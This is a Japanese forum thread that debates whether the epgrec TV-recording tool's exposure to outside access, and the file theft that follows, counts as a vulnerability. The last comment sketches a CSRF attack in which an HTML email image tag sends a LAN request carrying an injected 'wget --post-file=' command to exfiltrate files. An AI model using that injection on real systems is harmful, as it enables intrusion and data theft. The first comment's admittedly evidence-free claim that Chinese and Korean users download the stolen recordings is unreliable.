アカウント名:
パスワード:
日本の消費者が使っているいろいろな製品には、以前から脆弱性があることが海外で知られていて、そういう脆弱性を持つ製品の一つにepgrecがある。脆弱性を攻撃して盗み取ることができたコンテンツはtorrentで流しやすい形に変換して流されている。それを中国や韓国といった日本のコンテンツに対して親和性が高い国の人々がカジュアルにダウンロードしている。
根拠は示せないけれどIDで。
脆弱性といえばそうだけど、どちらかというと仕様に近いようだぞ。
http://osdn.jp/projects/epgrec/forums/22249/32215/ [osdn.jp]
そもそも、epgrecは外部に公開することなど考慮してませんし、そのような目的のツールでもありません。アクセス制御なしにepgrecを外部に公開するのは著しく愚かな行為で、愚かな人が攻撃を受けるのは自業自得です。
対応の必要があるとは思えません。
まあ、作者の言ってることはその通りなんだけど、すげー直接的な表現で笑った。
ご紹介ありがとうございます。
IPAの報告対象となる脆弱性の定義には当てはまらなさそうですね。
現にセキュリティリスクが認められて、その原因が仕様上の不備に求められるようであれば、脆弱性であろうがなかろうが対応してもいいんじゃないかと個人的には思います。
ただ、ネットの環境によってはファイルが盗られる、しかもそれはテレビ番組の録画ファイルに限られるのであれば、その程度のためにどれほどの対応を製品の作者に求められるかというと、あまり負担はかけられないようにも思います。
仕様上の不備ではなく、使用者の無知だからねえ。
第三者がepgrecを操作できるように、LANが公開されているならほかにも、いろんなデータが、そのLANの中から持ち出せるんじゃないかと…
有志が他のソフトによるアクセス制御の方法を啓蒙するって方がマシじゃないかな。この作者の言っていることは適切だと思う。
タレコミソース「/epgrec/へのWebアクセスは何がしたいのかを探る)」に
>EPGrecの昔の版は脆弱性があり、任意のPHPファイルを置いて実行できたようだ。>特に、実際にepgrecをインストールしてみると分かるのだが、>/epgrec/video/ や /epgrec/settings のパーミッションを777にするよう指示してくる(!)ので、>/video/辺りにphpスクリプトを仕込んで……という攻撃が一時期流行ったらしい。
と書いてあったから外部に晒せるソフトじゃないね。ログ速でもVPNかSSH使えという当たり前のツッコミされてた。
ただ、この2つは別の問題なんだよね。1.外部サーバーに録画したアニメを悪意の第三者(の外国人?)が勝手にDLした2.外部サーバーに悪意の第三者(の外国人?)がインジェクション仕込んで勝手に録画&DLした
1は著作権侵害だけど、2は不正アクセス禁止法違反、だよね?どっちにしろ脆弱性晒したサーバー監理者が悪いんだけどさ。
自己責任で突っぱねたら幇助に問われないのか?ソフト製作者と鯖管、どっちの罪が重い?
Winnyが通った道ですね。開発者は幇助に問われない [wikipedia.org]でしょう。
>対応の必要があるとは思えません。いや、ローカルからwww権限への権限昇格自体、立派な脆弱性だと思うが…。
HTMLメールで<img src="http://192.168.0.x/epgrec/...;wget --post-file= ...">を踏まさせることもできる予感。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
Stay hungry, Stay foolish. -- Steven Paul Jobs
epgrecが出元というよりも (スコア:2)
日本の消費者が使っているいろいろな製品には、以前から脆弱性があることが海外で知られていて、そういう脆弱性を持つ製品の一つにepgrecがある。
脆弱性を攻撃して盗み取ることができたコンテンツはtorrentで流しやすい形に変換して流されている。
それを中国や韓国といった日本のコンテンツに対して親和性が高い国の人々がカジュアルにダウンロードしている。
根拠は示せないけれどIDで。
Re:epgrecが出元というよりも (スコア:0)
脆弱性といえばそうだけど、どちらかというと仕様に近いようだぞ。
http://osdn.jp/projects/epgrec/forums/22249/32215/ [osdn.jp]
そもそも、epgrecは外部に公開することなど考慮してませんし、そのような
目的のツールでもありません。
アクセス制御なしにepgrecを外部に公開するのは著しく愚かな行為で、
愚かな人が攻撃を受けるのは自業自得です。
対応の必要があるとは思えません。
まあ、作者の言ってることはその通りなんだけど、すげー直接的な表現で笑った。
Re:epgrecが出元というよりも (スコア:1)
ご紹介ありがとうございます。
IPAの報告対象となる脆弱性の定義には当てはまらなさそうですね。
現にセキュリティリスクが認められて、その原因が仕様上の不備に求められるようであれば、脆弱性であろうがなかろうが対応してもいいんじゃないかと個人的には思います。
ただ、ネットの環境によってはファイルが盗られる、しかもそれはテレビ番組の録画ファイルに限られるのであれば、その程度のためにどれほどの対応を製品の作者に求められるかというと、あまり負担はかけられないようにも思います。
Re: (スコア:0)
仕様上の不備ではなく、使用者の無知だからねえ。
冷静に考えよう (スコア:0)
第三者がepgrecを操作できるように、LANが公開されているなら
ほかにも、いろんなデータが、そのLANの中から持ち出せるんじゃないかと…
Re: (スコア:0)
有志が他のソフトによるアクセス制御の方法を啓蒙するって方がマシじゃないかな。
この作者の言っていることは適切だと思う。
Re: (スコア:0)
タレコミソース「/epgrec/へのWebアクセスは何がしたいのかを探る)」に
>EPGrecの昔の版は脆弱性があり、任意のPHPファイルを置いて実行できたようだ。
>特に、実際にepgrecをインストールしてみると分かるのだが、
>/epgrec/video/ や /epgrec/settings のパーミッションを777にするよう指示してくる(!)ので、
>/video/辺りにphpスクリプトを仕込んで……という攻撃が一時期流行ったらしい。
と書いてあったから外部に晒せるソフトじゃないね。
ログ速でもVPNかSSH使えという当たり前のツッコミされてた。
ただ、この2つは別の問題なんだよね。
1.外部サーバーに録画したアニメを悪意の第三者(の外国人?)が勝手にDLした
2.外部サーバーに悪意の第三者(の外国人?)がインジェクション仕込んで勝手に録画&DLした
1は著作権侵害だけど、2は不正アクセス禁止法違反、だよね?
どっちにしろ脆弱性晒したサーバー監理者が悪いんだけどさ。
Re: (スコア:0)
自己責任で突っぱねたら幇助に問われないのか?
ソフト製作者と鯖管、どっちの罪が重い?
Re: (スコア:0)
Winnyが通った道ですね。開発者は幇助に問われない [wikipedia.org]でしょう。
Re: (スコア:0)
>対応の必要があるとは思えません。
いや、ローカルからwww権限への権限昇格自体、立派な脆弱性だと思うが…。
Re: (スコア:0)
HTMLメールで<img src="http://192.168.0.x/epgrec/...;wget --post-file= ...">を踏まさせることもできる予感。